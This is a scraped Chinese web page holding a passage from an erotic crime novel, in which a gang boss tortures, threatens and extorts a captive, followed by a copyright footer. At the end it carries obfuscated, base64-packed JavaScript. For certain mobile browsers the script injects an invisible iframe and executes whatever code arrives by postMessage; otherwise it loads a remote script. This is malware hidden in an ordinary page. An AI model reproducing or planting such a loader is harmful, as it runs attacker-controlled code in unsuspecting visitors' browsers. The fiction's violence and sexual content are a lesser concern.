儿。”“我…我…我们…真的是下…下个月就…就结婚啊。”胡二狗已经虚弱到了极点。“好好好,你有种,不怕死是吧,我成全你。文龙,一会儿你再让人多挖一个坑儿埋那女的,先把这孙子拉出去种上。”“没问题。”文龙一挥手,“跟我来吧。”立刻有两个手下过去架了胡二狗就向大门拖。“饶命啊…我说的是真话啊…”他怎么也想不通,侯龙涛明明是知道他和何莉萍的事儿的。据说后面有老虎追,人就能比平常跑得快。胡二狗对死亡的恐惧激发了他身体的潜能,一下就挣脱了架着他的两个人,向着桌子跑回来。可没跑两步,腿一软,摔了一交,但这却没能阻挡他的移动,紧着跪爬了一段,双手扒着桌沿,露出一个脑袋。“啊…啊…啊…涛…涛哥,我不敢骗您啊…”看着他鼻涕眼泪齐流的样儿,侯龙涛意识到他没说假话,“你真的会和她结婚?”“真…真的,我是真…真的不再混了,想…想成家,她…她那么漂亮,又支援我开…开歌厅,我…我是真的…真的要娶她…”这倒是侯龙涛事先没料到的,本以为他就是想玩儿完何莉萍,再卷着钱走人。今天抓他来,并不是要他去向何莉萍自首,只是要他加快行动,赶紧滚蛋。现在倒好,这主儿是真的要跟何莉萍成亲。不管怎么样,先得获得自己想要的资讯,“你这些照片在哪洗的?普通的照相馆是不会给你冲l照的。”“是…是我的一个…朋友开的…个体照相馆。”“他没留一份平常看着玩儿吗?”“没…没有,是我…我趁他不在时自己冲的。”“你那些要和你一起开歌厅的朋友都是干什么的?”“没有…根本没有什么朋友,那是我编出来骗莉萍的,我装成当兵的,不能…不能有那么多的钱,怕她怀疑,就说是跟人…跟人和伙。”“何莉萍出了多少钱?”“十…十五万。”侯龙涛双臂交叉在胸前,眯着眼睛想了想,原定的计画不用做什么改变,“那笔钱你到手了吗?”“没…没有,但我知道帐号…和…和密码。”胡二狗虽然被打了好几顿,但他身体还算结实,受的又全是外伤,其实没什么大碍,只是赤身暴露在零下几度的气温中,造成了他的虚弱,身体不停的瑟瑟发抖。“我看你是不想死吧?”侯龙涛拿过纸笔,不知在上边写着什么。“不…不想…当然不想…”“行,只要你帮我一个忙,我也绝不再为难你了,你看怎么样?”“什么…什么我都答应…”“先让他暖和暖和。”七、八个手下就开始忙乎,有人给他弄了一桶温水泡脚,有人从雅阁里取出他的衣服给他穿上,有人找来条毛毡给他裹上,又送来一杯热开水让他喝。二十多分钟后,胡二狗原先被冻成青紫色的嘴唇又出现了血色。侯龙涛从里屋拿出一个小答录机,将刚才那张纸放到胡二狗面前,“照着这个跟我对话,我知道你挺会演戏的,注意你的感情,懂吗?”胡二狗看了一遍,虽然不太明白他的用意,但也不敢多问,“懂,我懂。”两人把相同的对话来来回回的重复了得有十几遍,才算有了令人满意的效果,“你他妈可真够笨的,就这样也能骗女人,这年头真是长的俊就能吃的开啊。”侯龙涛边骂边把磁带取了出来。其实在这种又惊又吓又被打的情况下,胡二狗只用了十几次,已经很不容易了。“加上何莉萍那十五万,你银行里一共有多少钱啊?别跟我胡说,我一会儿叫人跟你回去看你的存折的。”“四十多万。”“呵呵,你小子还真够能敲的啊。”又给他扔过去一根烟。胡二狗战战兢兢的拿起桌上的打火机,生怕再挨一烟缸。把其中一个装钱的鞋盒子推到胡二狗面前,“剩下的这两个送给我吧。”本以为会血本无归,居然还能拿回一半,也算是不幸中的万幸了,更何况命悬人手,哪有不答应的余地。侯龙涛又从兜里掏出一张火车票,“等天亮了,你去银行把那十五万取出来,中午有一趟去广州的车,钱我让你带走,也算对得起你了。我不管你到那边是干正行,还是接着卖p眼儿,但是走了就别再回来。你要是胆敢再踏进北京半步,威胁的话我就不多说了。”说话的时候一眼也没看胡二狗,就像在自言自语一样,声音虽小,却更显y沈,让人不寒而栗。“那辆雅阁我要物归原主,你有什么意见,现在就说出来,免得走后又觉得亏了,再冒生命危险回北京,那就不好了。”侯龙涛抬起头,双眼中放s着冷酷的光芒。胡二狗很清楚,以他自己的力量是绝难和这个人抗衡的,除了全部接受,毫无它法,“我…我全都照办。”“文龙,你辛苦一下,带俩人帮胡老板一把,送他上火车。”“好。”文龙答应一声,叫上两个手下,压着胡二狗出去了。看着雅阁的尾灯消失在夜幕中,侯龙涛打开钱盒瞧了一眼,差不多有五万块。“麻子,把这给哥儿几个分了吧。”一个手下接住扔过来的鞋盒,对于这个新的幕后老板的大方,他们真是感激得不得了。慷他人之慨,侯龙涛从来不心疼…星期天下午,把薛诺叫到天伦王朝,这是被她母亲扇了一耳光后,两人第一次见面。侯龙涛坐在客厅的沙发上,让美丽的少女坐在自己腿上,左臂搂着她的腰,右手抚摸着她的柔发。薛诺明显的有些忧郁,平时一见侯龙涛,就会快乐得像只小鸟一样,“唧唧喳喳”个不停,可今天从进屋到现在一共也没说几句话。“怎么了,诺诺?心情不好吗?”轻轻吻了她的鼻尖一下。薛诺撅着小嘴,“我…我这两天心里好乱,涛哥,你…你不会怪我吧?”“因为什么要怪你?”“因为我妈妈她…她打了你呀。”一双水汪汪的大眼睛里充满了愧疚与不安。“呵呵呵。”侯龙涛真是爱死这个心事重重的小姑娘了,一把把她的上身放平,将她粉嫩的香舌吸进嘴里,热烈的品尝了一番。等到有娇喘从薛诺的樱唇间发出,再把她紧紧抱在怀里。“嗯…涛哥…”“小亲亲,别说那件事错全在我,就算你真的有错,我也不会怪你的。不光是那件事,无论你今后做出多大的错事,我都不会怪你的,我只会疼你、爱你,舍不得怪你。”薛诺坐起身来,扶着男人的肩膀,“真的?”侯龙涛的表情郑重严肃,“真的,我对天发誓。”“涛哥…”沉浸在无比喜悦中的少女扑进爱人的怀中,只觉这一刻,自己是世界上最幸福的女人,完全忘了要把胡学军的事问清楚的打算。薛诺的白色高领羊毛衫质地很好,在她后背轻抚时,可以很容易的摸出胸罩扣的突起。“诺诺,咱们做a吧。”自从吃了邹康年的药,任何一点小小的刺激都会让他兴奋。美少
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}